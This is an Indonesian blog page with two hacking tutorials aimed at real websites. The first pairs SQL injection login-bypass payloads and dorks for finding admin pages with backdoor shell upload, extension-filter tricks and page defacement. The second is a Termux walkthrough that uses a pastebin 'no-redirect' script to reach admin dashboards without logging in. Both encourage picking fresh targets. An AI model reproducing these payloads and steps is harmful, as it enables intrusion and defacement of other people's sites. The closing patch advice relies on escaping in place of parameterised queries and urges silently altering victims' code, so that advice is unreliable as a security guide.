Akhir kata, semoga tutorial SQL Injection Base64 yang saya tulis ini dapat bermanfaat buat teman-teman semuanya.

Semoga suka, Terimakasih ya!

Tutorial Deface Bypass Admin Login dan Cara Patch Bug Bypass Admin

By On 5:57:00 AM


Hallo, Apa kabar?

Bypass Admin Login~ Sebenarnya ini tidak jauh berbeda dan masih berhubungan dengan SQL Injection. Jika kita ketahui, bug ini memungkinkan seorang attacker untuk masuk sebagai admin hanya dengan memasukan username dan password contoh seperti or 1=1 tanpa harus repot-repot seperti halnya melakukan ekploitasi website.

Tutorial Deface Bypass Admin Login

Pengertianya cukup itu saja. Oiya buat yang masih belum mengerti atau pengen tahu yang lebih jelas, kenapa ini bisa terjadi? Lalu dimana letak kesalahan tersebut? Oke, saya sudah menyiapkan artikel sebagai referensi untuk bisa kamu baca mengenai hal ini, berikut linknya:

Payload Bypass Admin

Dari sekian banyak query yang bertebaran di internet, disini saya akan membagikan beberapa query yang sering saya gunakan untuk bypass admin login website, diantaranya sebagai berikut:

admin' #
admin' or '1'='1
admin' or '1'='1'#
admin' or 1=1 or ''='
'or 1=1 limit 1 -- -+
' or '1'='1
' or 'x'='x
' or 0=0 --
' or 0=0 #
' or 1=1--
' or 'one'='one
'or 1=1-- -
'or''='

Hanya segitu? Iya cuma itu saja, payload bypass admin login tersebut saya gunakan dari awal saya mengenal/melakukan deface (2015) sampai sekarang (tapi sudah jarang sekali). Nah, jika kamu punya payload yang lain mungkin bisa di share pada kolom komentar biar teman-teman yang lain juga pada tahu.

Baiklah tanpa berlama-lama, sekarang mari kita ke inti pokok pembahasan selanjutnya, lestgooo.

Tutorial Bypass Admin Login Website

Nah, apa saja yang diperlukan? Berikut diantaranya:

1. Dork
2. Shell Backdoor
3. Script Deface

Penjelasan:
Dork~ Jika tidak punya target kamu bisa mencari website yang terkait vulnerability bypass admin login dengan dork, contoh dork misalnya.

"inurl:/admin/login.php"
"inurl:/admin/login.php" site:.id

Selebihnya kamu kembangkan lagi ya biar bisa dapat yang fresh.

Shell Backdoor~ File backdoor ini berguna untuk edit, upload dan lain sebagainya.

Script Deface~ Jika belum punya kamu bisa download script deface lewat pencarian Google atau kalo bisa ya lebih baik bikin sendiri saja.

Baiklah dari apa yang sudah saya sebutkan (3 bahan) tadi, jika kamu sudah punya. Sekarang mari kita simak beberapa tutorial dibawah ini.

POC (Prof End Concept) Bypass Admin Login

Step 1: Eksekusi Target

Hasil dari mencari target dengan dork, kurang lebih seperti ini target yang saya dapatkan.

http://target.com/admin/index.php

Nah sekarang, tinggal mengeksekusi website tersebut bisa atau tidaknya saya dapat masuk ke dashboard panel admin dengan menggunakan payload yang tadi saya sebutkan diatas dan saya mencoba menggunakan payload yang admin' or 1=1 or ''='

Disaat berada di dashboard panel admin login, kamu isikan username: admin' or 1=1 or ''=' password: admin' or 1=1 or ''='

Halaman Login Admin

Kemudian tinggal klik pada tombol Login website tersebut. Apabila berhasil kamu akan diarahkan menuju ke menu dashboard panel admin website tersebut, dan itu artinya kamu sudah bisa mengakses seluruh isi website.

Dashboard Panel Admin Website

Catatan: Perlu di ingat, tidak semua form login admin website bisa di injeksi dengan cara seperti ini, jika gagal kemungkinan sudah di patch bugnya, kamu bisa coba payload yang lain atau cari target yang lainya saja.

Step 2: Upload Shell

Jika kamu sudah berhasil masuk ke dashboard panel admin website target kamu itu artinya sekarang kamu sudah bisa upload shell, edit artikel dan lain sebagainya.

Lalu bagaimana caranya upload shell backdoor?

Tips: Jika kita tidak bisa upload shell backdoor dikarenakan form upload tersebut hanya memperbolehkan upload file berformat ".jpg, .gif, .jpeg" kita bisa mengakalinya dengan bypass extensi shell tersebut. Contoh misalnya seperti ini "shell.php.jpg, shell.jpg.php, shell.jpg.PhP" dan lain sebagainya.

Dan untungnya pada target saya tidak terlalu ribet harus ini itu untuk upload shell backdoornya alias tidak ada masalah sama sekali, kira-kira kalau saya jelaskan proses atau alur upload shellnya begini.

Cari tempat upload > tempat upload ketemu di bagian menu partners > kemudian tinggal upload shell backdoor extensi .php > Done tanpa harus bypass shell.

Tampilan Shell Backdoor - Upload Sukses

Info: Jika belum punya shell backdoor bisa download dari link berikut ini > Download Shell Backdoor

Step 3: Deface

Oke, setelah berhasil menanam shell backdoor pada website target. Langkah selanjutnya kita tinggal upload file script deface, jika ingin menebas index.php tinggal cari aja di bagian directory home page website tersebut. Tapi disini saya hanya menitipkan file saja tidak mengganti file index.php sama sekalipun.

Tampilan Script Deface

Gimana menurut kamu mudah bukan? Jangan lupa untuk mencobanya sendiri ya tapi tidak boleh berlebihan, dikarenakan berbahaya.

Lanjut aja yukk.

Ada baiknya kalau kita setelah melakukan deface website tersebut, kita juga bisa membantu mereka dengan menutup atau patch bug bypass admin login tanpa harus melaporkan terlebih dahulu, cukup lakukan secara diam-diam dan anggap saja ini sebagai bonus dari kamu gitu deh, heker baik hati wkwkk.

Untuk caranya simak penjelasan singkat berikut ini.

Cara Patch Bug Bypass Admin Login


Sebenarnya untuk cara melakukan patch bug bypass admin pada website itu sangat mudah, kamu hanya cukup dengan menambahkan perintah mysqli_escape_string.

Berikut ini contoh source kode yang memiliki vulnerability bypass admin login, saya akan ambil bagian tertentu saja ya.




<?php
$message = "";
if(isset($_POST['submit'])) {
$username = ($_POST['username']);
$password = ($_POST['password']);
kode bla bla bla
kode bla bla bla
kode bla bla bla
} else {
$message = "Username and Password is not matched";
}
}
?>

Jika kita pahami pada source kode diatas, berikut ini adalah kode dimana yang menjadi masalah yaitu bisa di bypass admin login.

$username = ($_POST['username']);
$password = ($_POST['password']);

Penjelasan begini, kita tahu bahwa kode tersebut tidak ada filterisasi karakter yang mengakibatkan adanya bug dimana seorang attacker bisa dapat memasukan query injeksi dan dapat masuk ke dashboard panel admin suatu website.

Nah, maka dari itu kita tambahkan saja kode atau fungsi mysqli_escape_string di bagian kode yang dapat menyebabkan bug tadi, jika digabungkan caranya seperti ini kodenya.

$username = mysqli_escape_string($con, $_POST['username']);
$password = mysqli_escape_string($con, $_POST['password']);

Sudah paham kan caranya? Jika sudah, Bagus deh!

Jadi setelah menambahkan filter pada bagian kode $username dan $password dengan fungsi mysqli_escape_string tersebut, seorang attacker tidak akan bisa menginjeksi admin login, mantap haha.

Selamat mencoba, enjoy...

Penutup:

Demikian artikel sederhana yang saya tulis ini, tentang Tutorial Deface Bypass Admin Login dan Cara Patch Bug Bypass Admin berdasarkan pengalaman yang sudah saya pelajari, semoga dapat berguna dan bermanfaat buat semua orang.

Dari saya maaf jika ada kesalahan atau kurang jelas dalam penulisan, mohon untuk diluruskan/maklumi karena saya juga pemula pake banget. Buat kamu ada yang mau dipertanyakan soal ini silahkan tuliskan dikolom komentar dibawah, sebisa mungkin saya akan bantu jawab.

Matursuwun, Bye~

Tutorial Cara Bypass Admin Login Page Dengan No Redirect - Android

By On 4:07:00 AM


Bypass Admin Login Page No Redirect~
Hallo, Apa kabar?
Melalui artikel ini, saya ingin sedikit sharing tentang bagaimana cara mengekploitasi celah atau vulnerability No Redirect di suatu website.

Biasanya celah ini ditemukan pada suatu halaman login page, dengan adanya celah no redirect ini kamu bisa menjadi admin website tanpa harus terlebih dahulu mengetahui nama seperti username, password dari website tersebut.

Bypass Admin Login Page with No Redirect

Sebagai contoh pada suatu kasus, untuk bisa masuk ke halaman Dashboard Admin yang biasanya terdapat pada file /admin/dashboard.php kita diharuskan untuk login terlebih dahulu. Nah, maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login terlebih dahulu, misalnya di file /admin/login.php

Jadi, sudah paham kan maksudnya? Oke sipp.

Sekarang, tanpa berlama-lama mari kita lanjut ke tutorial selanjutnya.

Bahan-bahan:
Di tutorial ini saya memakai Hp Android, jadi apa saja yang harus dipersiapkan adalah sebagai berikut ini,

1. Termux
2. Browser Chrome
3. Script PHP (NO REDIRECT) Web Bassed

Cuma 3 itu saja yang harus dipersiapkan untuk melakukan cara ini, simpel kan? Sebenarnya caranya mudah kok tidak terlalu ribet. Baiklah setelah kamu mempersiapkan sesuai apa yang sudah saya sebutkan, sekarang ayo mari kita mulai step by step berikut ini.

Cara Bypass Admin Login Page Dengan No Redirect

Langkah 1: Termux

Buka aplikasi terminal Termux kamu, kemudian kalian ketikan perintah seperti berikut ini,

$ pkg install php

Jika sudah selesai install package PHP, langkah selanjutnya kita download terlebih dahulu script php no redirect web bassed tersebut, yang mana script ini nantinya bisa kita gunakan untuk bypass halaman admin login website.

Link download > Script PHP (No Redirect)
Atau kalau yang mau simpel cara download script tersebut, bisa kalian ketikan perintah berikut ini,

$ curl https://pastebin.com/raw/L60bXtWD>no-redirect.php

Sudah bisa downloadnya?
Oke, langkah selanjutnya adalah menjalankan localhost di termux dengan PHP yang mana ini nantinya bisa kita gunakan sebagai web server untuk menjalankan script no-redirect.php tersebut.

Ketikan perintah berikut ini pada terminal Termux kamu,

$ php -S localhost:8080

Kemudian tekan enter ya, langkah selanjutnya simak penjelasan berikut ini.

Langkah 2: Jalankan Script No Redirect di Browser Chrome

Jika kamu sudah mengikuti step by step seperti apa yang sudah saya jelaskan diatas, sekarang mari kita ke langkah untuk eksekusi target.

Hal pertama, buka aplikasi Browser Chrome kamu kemudian ketikan perintah berikut ini pada kolom address bar chrome kamu,

http://localhost:8080/no-redirect.php

Jika sudah kamu jalankan, kira-kira tampilan dari script no-redirect.php tersebut seperti ini,

No Redirect Script PHP Web Bassed Tools

Lalu gimana lagi?
Disini saya asumsikan kamu sudah punya target yang mau dibypass. Nah oke, sekarang langkah selanjutnya adalah memasukan URL target yang mau di bypass pada kolom input.

CATATAN: Sebelum kamu klik tombol GO ada baiknya kamu off kan terlebih dahulu JavaScript di browser chrome tersebut biar tidak ada kendala saat dalam proses eksekusi target.

Jika belum tahu caranya menonaktifkan JavaScript di Chrome, pergi ke Setelan > Setelan situs > Klik JavaScript > Terus off/blokir.

Contoh target saya, anggap saja seperti ini,

http://target.com/admin/dashboard.php

Isi target url pada kolom input - script no-redirect.php
Kalau sudah kamu ketikan URL di kolom input, kemudian langsung saja klik tombol GO pada script tersebut, dan lihat apa yang terjadi?

Sukses Berhasil Bypass Admin Login Dengan No Redirect

Yuhuu mantap sekali, saya berhasil bypass halaman dashboard website tersebut tanpa harus login menggunakan user/pass terlebih dahulu alias bypass no redirect berhasil wkwkk.

TIPS: Bagaimana bisa saya menemukan file directory "/admin/dashboard.php", nah untuk hal ini kamu bisa menebak secara manual sesuai imajinasi kamu, atau kalau tidak bisa kamu bisa menggunakan tools seperti Dirsearch, Admin Finder, dan lain sebagainya untuk mencari directory file halaman admin login tersebut.

Setelah itu, jika sudah sukses bypass no redirect kamu mau apakan website tersebut? Itu terserah kamu aja deh ya.

Selesai deh...

Perlu diketahui juga, terkadang dengan mengaplikasikan teknik bypass halaman admin login page dengan no redirect seperti ini, tidak semuanya berjalan sesuai apa yang dipikirkan, kadang bisa di bypass kadang tidak bisa di bypass. Bisa jadi ketika tidak bisa di bypass kemungkinan website target tersebut sudah di patch atau malah ada waf (saya kurang tahu), tidak apa-apa jangan ambil pusing mungkin bisa cari target yang lain.

Oke kurang lebih seperti itu, demikian artikel sederhana yang saya tulis ini, semoga apa yang saya bagikan ini dapat bermanfaat buat teman-teman semua. Jika ada kesalahan entah itu dalam penjelasan/penulisan mohon untuk diluruskan ya. Ingat, artikel ini saya tulis hanya bertujuan untuk edukasi.

Sekian dari saya, Terimakasih!

Contact Form

Name

Email *

Message *